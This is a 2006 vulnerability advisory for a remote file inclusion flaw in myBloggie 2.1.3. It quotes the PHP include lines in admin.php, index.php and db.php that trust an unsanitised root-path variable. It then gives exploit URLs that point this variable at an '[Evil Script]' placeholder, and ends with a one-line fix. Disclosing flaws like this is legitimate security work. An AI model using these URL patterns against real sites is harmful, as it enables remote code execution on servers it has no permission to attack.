-----------------------------------------------------------------------------------------
myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion
-----------------------------------------------------------------------------------------
Author   : Sh3ll
Date     : 2006/04/29
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email    : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
-----------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : myBloggie
version     : 2.1.3
URL         : http://www.mywebland.com , http://mybloggie.mywebland.com
Description : 
myBloggie is considered one of the most simple, user-friendliest yet packed
with features Weblog system available to date.
-----------------------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~
in admin.php , index.php & db.php We Found Vulnerability Scripts
----------------------------------------admin.php----------------------------------------
....
<?php
        include($mybloggie_root_path.'spacer6.php');
        ?>
...
----------------------------------------index.php----------------------------------------
....
<?php
}
if (!isset($mode)) {
    include($mybloggie_root_path.'blog.php');
}
$template->pparse('sidevert');
}

// End right sidemenu condition

// Sidemenu menu items. You can change the menu item order here
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
include($mybloggie_root_path.'searchform.php');
include($mybloggie_root_path.'spacer.php');
}
...    

-------------------------------------------db.php----------------------------------------
....
<?php
       include($mybloggie_root_path .'includes/mysql.php');
       ?>
...
-----------------------------------------------------------------------------------------
Exploit:
~~~~~~~
http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variabel $mybloggie_root_path in admin.php , index.php & db.php
-----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams